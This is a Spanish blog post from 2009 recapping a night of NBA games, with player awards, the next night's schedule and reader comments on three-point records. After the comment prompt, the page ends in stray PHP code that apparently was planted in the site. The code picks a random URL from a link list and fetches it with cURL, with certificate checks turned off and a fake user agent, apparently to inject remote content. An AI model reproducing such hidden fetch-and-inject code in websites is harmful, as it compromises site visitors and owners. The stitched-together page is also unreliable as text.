La Crónica (24/11/2009)

25 de November de 2009 por txusma

Pocos sobresaltos pero sí alguna que otra sorpresa en la jornada de anoche.

Quizás lo más noticioso fuera el choque Philadelphia@Washington tras la triste noticia de la muerte de Abe Pollin, dueño de la franquicia capitalina durante 45 años. Los locales sufrieron de lo lindo para lograr una victoria que pudieran dedicarle, tras desperdiciar una renta de 14 puntos. Un último triple de Louis Williams estuvo a punto de hacer la derrota doblemente dolorosa. No entró y los partidazos de Antawn y de Nick Young, además de los 6 tapones de McGee, sirvieron de amable epitafio para el desaparecido.

Lo fue también el quinteto de los Warriors que metió el dedo en la llaga en el American Airlines. Decía Monta Ellis que no podría jugar junto a Curry al mismo tiempo. No hijo no: Junto a Curry, Morrow, Radmanovic y Mikki Moore. Ouh Yeah!!! Pero lo que menos se podría imaginar Ellis es que con ellos iba a dar la campanada en casa del líder de la Southwest. Nosotros tampoco lo hubieramos creído, aún con todas las lesiones que arrastran los Mavs.

No fue noticia que los Nuggets ganaran sin sudar a los Nets, así como los Lakers hicieran lo propio con los Knicks. Tampoco tanto que los Thunder la montaran en Salt Lake. Durant, Green y Westbrook profanaron el templo mormón, así como la legendaria defensa de Sloan.

Por último los Raptors completaron un extraordinario partido colectivo. 8 tíos en dobles figuras con un exquisito juego de pase. Uno de los más completos partidos de Calderón este año, precísamente contra Tj Ford delante. Junto a él Jack y Turkoglu estuvieron inmensos.

PREMIOS

MVP: Una actuación de 37 puntos y 8 asistencias como lo de Monta Ellis sería merecedora del MVP sino fuera por las 11 pérdidas que ha cosechado. Mejor le damos el premio a Kobe Bryant (34 puntos) o Antawn Jamison (32 puntos y 14 rebotes), enorme desde que volvió de la lesión.

Rookie: La salida de Jrue Holiday revolucionó a su equipo en el último cuarto del partido quedándose a un paso de consumar la remontada. En apenas 10 minutos, el base anotó 11 puntos, capturó 6 rebotes, robó 2 balones y dio una asistencia. Eso es aprovechar el tiempo.

Sorpresa: En los Wizards, Nick Young (20 puntos) parece aprovechar el vacio que ha dejado Randy Foye tras su lesión, veremos si el ex de Minnesota vuelve a la titularidad. Por su parte Anthony Morrow ha demostrado hoy que sabe hacer algo más que anotar y a sus 27 puntos ha sumado 9 rebotes, 5 asistencias y 3 robos. Pero para sorpresa los 14 puntos de Jason Smith, que ha jugado integramente todo el último cuarto del Wizards-Sixers.

Decepción: ¡Que me devuelvan a Elton Brand!¡Que este no es, que me lo han cambiado! En los últimos partidos asistimos a un espejismo y parecía que el ex de Duke volvía poco a poco a su mejor nivel pero el partido de hoy le baja de nuevo a la tierra de golpe: 4 puntos con 1 de 9 en tiro. De los Nets ya ni hablo.

Esfuerzo en vano: Hace tiempo que no veíamos a Danny Granger por estos andurriales pero a pesar de sus 36 puntos ese 11 de 27 en tiros de campo le quita alguna opción de alzarse con el premio. Dirk Nowitzki (28-10) y Louis Williams (26 puntos) le disputan el galardón.

RAZONES PARA TRASNOCHAR

Partidos para todos los gustos esta madrugada. Podremos ver a los españoles en el Toronto-Charlotte (1h00), el Memphis-Phoenix (3h00) y el New York-Sacramento (4h00); a los mejores equipos del Este en el Miami-Orlando (1h30), el Philadelphia-Boston (1h30) y el Cleveland-Detroit (2h00); y a destacados del Oeste con el Denver-Minnesota (2h00), Milwaukee-New Orleans (2h00), Dallas-Houston (2h30), Golden State-San Antonio (2h30) y New Jersey-Portland (4h00). A priori el partido de menos interés es el Clippers-Pacers (1h00) pero nunca se sabe…

VIDEO

Mejores jugadas del día. Fijaos en los impresionantes pasos que se marca Deron Williams y en el tapón que se lleva un especialista como Anthony Randolph.

Comenta

13 comentarios a esta entrada

  1. sergio dice:
    #1

    http://www.youtube.com/watch?v=oVGeooi7Doc mas bonitos son estos pasos de Luke “Skywalker” Walton.
    Aunque en la Universidad de Duke directamente no existen!!!!:
    http://www.youtube.com/watch?v=-7DjZehIGvs
    http://www.youtube.com/watch?v=-LFDIkJKDXM

    Lo que no comprendo es como el reverso de Bryant entre dos jugadores no sale en las mejores jugadas…

    Curiosas pintas las de Jamison con el trozo de camiseta interior asomando. Pero lo que da mas risa es ver a los Nets jugando. Que penita de tios… aunque mas doy yo que los puse en Playoffs en la Megaporra (espero acertar antes los Euromillones que no van de intuicion xD).

    Impresionantes los 6 tapones de McGee, pero es que fueron en 14 minutos… Dicen que es el jugador que puede machacar mas alto de la liga y no sere yo quien lo ponga en duda. Creia que no veria 11 perdidas otra vez este año despues de las de Arenas. Error. Solo he tardado 1 mes.

      Citar

  2. HeiNeKeN dice:
    #2

    Arenas casi la vuelve a liar con una perdida de balon a falta de 30 segundos…

      Citar

  3. Dantley2 dice:
    #3

    jo, jo, impresionantes los pasos de Deron. Eso sí, no nombrarás el nombre de Randolph en vano, ya ajustaremos cuentas.

    Para mí lo de los Warriors ayer fue una hazaña. Nelson anda con neumonía y su ayudante está menos loco, eso ayuda, pero tenían a 6 tipos sanos. 3 jugaron 48 minutos. Ahora mismo Ellis me parece no All-Star, sino superestrella, lo que está haciendo está al alcance de 8 o 10 jugadores en la liga. Eso sí, no deja de ser Ellis y su cabeza como lo de las 11 pérdidas, pero no acaba de quitarle todo el mérito. Morrow y su 6 de 8 en triple tampoco tiene desperdicio. Llevaun 56% de efectividad en triples.

      Citar

  4. jonatan dice:
    #4

    Morrow para mi puede perfectamente batir la marca de 269 triples jugando los minutos que jugo ray allen
    cuando lo consiguio eso esta claro. si a este chico le entra uno puede fayar 2 triples de cada 10 que tire perfectamente

      Citar

  5. Txusma dice:
    #5

    Arenas en modo “cancer”. Ya ha rajado de sus compañeros concretamente de Caron Butler…

      Citar

  6. jonatan dice:
    #6

    respecto alo que e dichode morrow ayer no fue solo el 6-8 sino que metio los 5 ultimos sin fallo

      Citar

  7. Love Denise dice:
    #7

    jonatan, 269 es el record de triples en regular season?

      Citar

  8. jonatan dice:
    #8

    Estoy casi al 100% seguro de que si es ese

      Citar

  9. sergio dice:
    #9

    Confirmado. Ese es el record. Lo hizo en la temporada 05/06

      Citar

  10. Dantley2 dice:
    #10

    Pues 269/80 partidos sale a menos de 3.5. Morrow con minutos los hace sobradamente si jugaran más para él. Si las riendas las llevaMonta sólo le pasa cuando está totalmente abierto, mientras que si juega sólo Curry+Morrow se la pasa siempre. Ahora con 30 minutos más o menos, está en 2.3 triples por partido.

      Citar

  11. Óscar dice:
    #11

    Contra Portland, Morrow, Ellis y Curry jugaron los 48 minutos… Cosas de Nelson.

      Citar

  12. Dantley2 dice:
    #12

    Es que sólo tenían 6 disponibles. Y ni siquiera era nelson que está con neumonía

    Por cierto, hacía más de 50 años que un equipo NBA no ganaba con sólo 6 jugadores en su rotación

      Citar

  13. Txusma dice:
    #13

    Bueno, antes que Morrow, que no dudo que con más minutos y mas solidaridad por parte de Ellis subiría sus registros, aparecen como candidatos Granger (3.3 triples por partido, pero con un porcentaje deplorable del 37%), Gallinari (2.9), FRYE!! (2.7), etc… Eso sí, Morrow es de todos estos el que mejor promedio de acierto tiene (54.4%), aunque hay que tener en cuenta a Jason Richardson (46.6% y 2.6 triples por partido) e incluso a Brandon Jennings (46.8% y 2.2 triples por partido).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>